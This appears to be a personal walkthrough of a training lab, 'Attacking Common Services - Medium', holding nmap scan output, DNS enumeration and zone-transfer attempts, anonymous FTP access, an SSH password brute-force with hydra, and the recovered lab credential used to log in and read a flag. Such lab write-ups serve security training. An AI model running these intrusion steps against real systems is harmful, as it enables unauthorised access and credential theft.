Attacking Common Services - Medium

May 29, 2024

# Nmap 7.94 scan initiated Wed May 29 22:41:14 2024 as: nmap -sC -sV -oN nmap -vv 10.129.39.38
Nmap scan report for 10.129.39.38
Host is up, received conn-refused (0.65s latency).
Scanned at 2024-05-29 22:41:15 PST for 166s
Not shown: 995 closed tcp ports (conn-refused)
PORT     STATE SERVICE  REASON  VERSION
22/tcp   open  ssh      syn-ack OpenSSH 8.2p1 Ubuntu 4ubuntu0.4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 71:08:b0:c4:f3:ca:97:57:64:97:70:f9:fe:c5:0c:7b (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDEtihrnXMQHWhwZCWFPcX8gmBy8EEBjJ9T5lR/9onJz7XvUdcPTsaOovhhVrgFaQu1U5ekn4V+OYuIxJrEfl0dcBhSqQSb81MO3bTK5yZ+rQ958rl5PiYwKGeFc0VR9P3abEdKRn7bcEoXKSRoMof6vwkJMzb5N/7JBFYUo/jfbzovKEkX4t4Bwh6W4dmcPL6Mh4DJjhaHX6qZcC4MZoOV2oLW82T0tfH/KNLsMXBJ/Yqh8GziGy+jcLl31abch2+inXHTdKhoCOHR+A970VjskUs2iWCRsNkYREtTtpCZ738m1gdMQS+BzV2ZhRRcDnGOXMzR7Rk5Azs+luaGNzRlb1q2+NSQlmGzgBEPvIoL4/pBDM3fb8ZiL4gWvq3bqyPGdOi2nZfbpyeYzAqUe6THRvwjAS1wWUMLNt6jgt13xCTVOZV4hKMmLneb/VQXRoDFBF/vFoFDiPxeVNaM7dvBVQIBYbkBLqjYLVV1IFr2otRIbtVrLU+/D/mJvmXM3Xs=
|   256 45:c3:b5:14:63:99:3d:9e:b3:22:51:e5:97:76:e1:50 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBGrNZZh3PTca9YkLp+xpAXtquE6wsTwEZmBtt6mism0idkizZWojfLqjeonge0ZYBEfXjTgMsfJ366hpWedHE8U=
|   256 2e:c2:41:66:46:ef:b6:81:95:d5:aa:35:23:94:55:38 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIPlAiOeV++/9T5HzXC37wJRor3PaSuVOGLaNFz7pEl1/
53/tcp   open  domain   syn-ack ISC BIND 9.16.1 (Ubuntu Linux)
| dns-nsid: 
|_  bind.version: 9.16.1-Ubuntu
110/tcp  open  pop3     syn-ack Dovecot pop3d
| ssl-cert: Subject: commonName=ubuntu
| Subject Alternative Name: DNS:ubuntu
| Issuer: commonName=ubuntu
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2022-04-11T16:38:55
| Not valid after:  2032-04-08T16:38:55
| MD5:   a03e:afe0:3b9e:242f:45ce:81ea:9205:485b
| SHA-1: f95b:c0ca:f558:d268:5442:7213:80b6:ec09:2df5:55c0
| -----BEGIN CERTIFICATE-----
| MIIC0DCCAbigAwIBAgIUeMVofg2YJUJ0HWoQhmqxXI69w2cwDQYJKoZIhvcNAQEL
| BQAwETEPMA0GA1UEAwwGdWJ1bnR1MB4XDTIyMDQxMTE2Mzg1NVoXDTMyMDQwODE2
| Mzg1NVowETEPMA0GA1UEAwwGdWJ1bnR1MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8A
| MIIBCgKCAQEA2rtfaaHQrl9Ac7lIhEgZro8l1yEfCwxrj2JOQitGR2i+bKlcG+xA
| EeSJdKb+8y42BgBzoP5s6Y3DuUhfhy0p9C9FCjolhIcSyr7Cpq3QpYEw/WLtsaoK
| JXUUECgCS9uzgszW1qWR5AwoQzgCIkYdberr5jKcvXdG6sv4+juvUK4/KvbnXs1O
| 4kooxSwr/GlW0UFD1BaYWwE2BT4b+PqVllOgPUfMuR4lVs892g6uu/jNAgSPjBxf
| gPGRmnorLOecwC/f3M4uatCKodrnf1CGv2HMShprBCrucbg6tBCd8rOIk7ew/b6k
| SfWiK4pZeAIXeIrWrY4G9e8b9UZXvCyhBwIDAQABoyAwHjAJBgNVHRMEAjAAMBEG
| A1UdEQQKMAiCBnVidW50dTANBgkqhkiG9w0BAQsFAAOCAQEAgtVn8qN6Hzuw9zHu
| JCPBS7bdUtgjpL8xmkhBt1uvvdxTWoJn1r4n6LknkPAY/XUQ7oh6vkkwFeDMoukI
| zmTS3V8vk9+ue2WzkCjCghFdyqnMzQvROqmcu13Mu1fHmKHgOCYEcees35XDML1g
| jbjVng+iUN/92J6NLInwHHgPCv7Lpkf6cjwW3UfaBLCCSxa7zfTRpjCUX+MD9F25
| tpucL1SL6e76vl2jsEbQ0lbYVWI3/rbjE/Jdygzo1+P3N6gHCQGNFBTvxblmB55T
| ixOb4kvT6NzprNWUaq+ur79P6NiVIb04OqxsKIcnIzLgfw3ua4WMAt0sB8B3CTkU
| +HCWZQ==
|_-----END CERTIFICATE-----
|_pop3-capabilities: RESP-CODES SASL(PLAIN) USER CAPA STLS TOP AUTH-RESP-CODE PIPELINING UIDL
|_ssl-date: TLS randomness does not represent time
995/tcp  open  ssl/pop3 syn-ack Dovecot pop3d
|_pop3-capabilities: SASL(PLAIN) UIDL RESP-CODES AUTH-RESP-CODE USER CAPA PIPELINING TOP
| ssl-cert: Subject: commonName=ubuntu
| Subject Alternative Name: DNS:ubuntu
| Issuer: commonName=ubuntu
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2022-04-11T16:38:55
| Not valid after:  2032-04-08T16:38:55
| MD5:   a03e:afe0:3b9e:242f:45ce:81ea:9205:485b
| SHA-1: f95b:c0ca:f558:d268:5442:7213:80b6:ec09:2df5:55c0
| -----BEGIN CERTIFICATE-----
| MIIC0DCCAbigAwIBAgIUeMVofg2YJUJ0HWoQhmqxXI69w2cwDQYJKoZIhvcNAQEL
| BQAwETEPMA0GA1UEAwwGdWJ1bnR1MB4XDTIyMDQxMTE2Mzg1NVoXDTMyMDQwODE2
| Mzg1NVowETEPMA0GA1UEAwwGdWJ1bnR1MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8A
| MIIBCgKCAQEA2rtfaaHQrl9Ac7lIhEgZro8l1yEfCwxrj2JOQitGR2i+bKlcG+xA
| EeSJdKb+8y42BgBzoP5s6Y3DuUhfhy0p9C9FCjolhIcSyr7Cpq3QpYEw/WLtsaoK
| JXUUECgCS9uzgszW1qWR5AwoQzgCIkYdberr5jKcvXdG6sv4+juvUK4/KvbnXs1O
| 4kooxSwr/GlW0UFD1BaYWwE2BT4b+PqVllOgPUfMuR4lVs892g6uu/jNAgSPjBxf
| gPGRmnorLOecwC/f3M4uatCKodrnf1CGv2HMShprBCrucbg6tBCd8rOIk7ew/b6k
| SfWiK4pZeAIXeIrWrY4G9e8b9UZXvCyhBwIDAQABoyAwHjAJBgNVHRMEAjAAMBEG
| A1UdEQQKMAiCBnVidW50dTANBgkqhkiG9w0BAQsFAAOCAQEAgtVn8qN6Hzuw9zHu
| JCPBS7bdUtgjpL8xmkhBt1uvvdxTWoJn1r4n6LknkPAY/XUQ7oh6vkkwFeDMoukI
| zmTS3V8vk9+ue2WzkCjCghFdyqnMzQvROqmcu13Mu1fHmKHgOCYEcees35XDML1g
| jbjVng+iUN/92J6NLInwHHgPCv7Lpkf6cjwW3UfaBLCCSxa7zfTRpjCUX+MD9F25
| tpucL1SL6e76vl2jsEbQ0lbYVWI3/rbjE/Jdygzo1+P3N6gHCQGNFBTvxblmB55T
| ixOb4kvT6NzprNWUaq+ur79P6NiVIb04OqxsKIcnIzLgfw3ua4WMAt0sB8B3CTkU
| +HCWZQ==
|_-----END CERTIFICATE-----
|_ssl-date: TLS randomness does not represent time
2121/tcp open  ftp      syn-ack
| fingerprint-strings: 
|   GenericLines: 
|     220 ProFTPD Server (InlaneFTP) [10.129.39.38]
|     Invalid command: try being more creative
|     Invalid command: try being more creative
|   NULL: 
|_    220 ProFTPD Server (InlaneFTP) [10.129.39.38]
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port2121-TCP:V=7.94%I=7%D=5/29%Time=66573ED8%P=x86_64-pc-linux-gnu%r(NU
SF:LL,2F,"220\x20ProFTPD\x20Server\x20\(InlaneFTP\)\x20\[10\.129\.39\.38\]
SF:\r\n")%r(GenericLines,8B,"220\x20ProFTPD\x20Server\x20\(InlaneFTP\)\x20
SF:\[10\.129\.39\.38\]\r\n500\x20Invalid\x20command:\x20try\x20being\x20mo
SF:re\x20creative\r\n500\x20Invalid\x20command:\x20try\x20being\x20more\x2
SF:0creative\r\n");
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Wed May 29 22:44:01 2024 -- 1 IP address (1 host up) scanned in 166.75 seconds

Starting Nmap 7.94 ( https://nmap.org ) at 2024-05-30 19:40 PST
Nmap scan report for 10.129.11.163
Host is up (0.29s latency).

PORT      STATE SERVICE VERSION
30021/tcp open  ftp
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_drwxr-xr-x   2 ftp      ftp          4096 Apr 18  2022 simon
| fingerprint-strings: 
|   GenericLines: 
|     220 ProFTPD Server (Internal FTP) [10.129.11.163]
|     Invalid command: try being more creative
|_    Invalid command: try being more creative
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port30021-TCP:V=7.94%I=7%D=5/30%Time=665865C0%P=x86_64-pc-linux-gnu%r(G
SF:enericLines,8F,"220\x20ProFTPD\x20Server\x20\(Internal\x20FTP\)\x20\[10
SF:\.129\.11\.163\]\r\n500\x20Invalid\x20command:\x20try\x20being\x20more\
SF:x20creative\r\n500\x20Invalid\x20command:\x20try\x20being\x20more\x20cr
SF:eative\r\n");

sudo vim /etc/hosts
cat /etc/hosts

./subbrute.py inlanefreight.htb -s ./names.txt -r ./resolvers-try.txt

dnsenum --dnsserver 10.129.39.38 --enum -p 0 -s 0 -o subdomains.txt -f /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-110000.txt inlanefreight.htb

# I GOT NOTHING WHEN
dig axfr *.inlanefreight.htb @inlanefreight.htb

dig axfr *.inlanefreight.htb. @10.129.201.127

ANSWER HERE

ftp 10.129.11.163 30021

ls -la
cd simon
ls -la
get mynotes.txt

cat mynotes

hydra -l simon -P mynotes.txt 10.129.11.163 ssh

login: simon   password: 8Ns8j1b!23hs4921smHzwn

ssh simon@10.129.11.163

ls
cat flag.txt

PreviousAttacking Common Services - Easy Lab NextAttacking Common Services - Hard

Last updated 11 months ago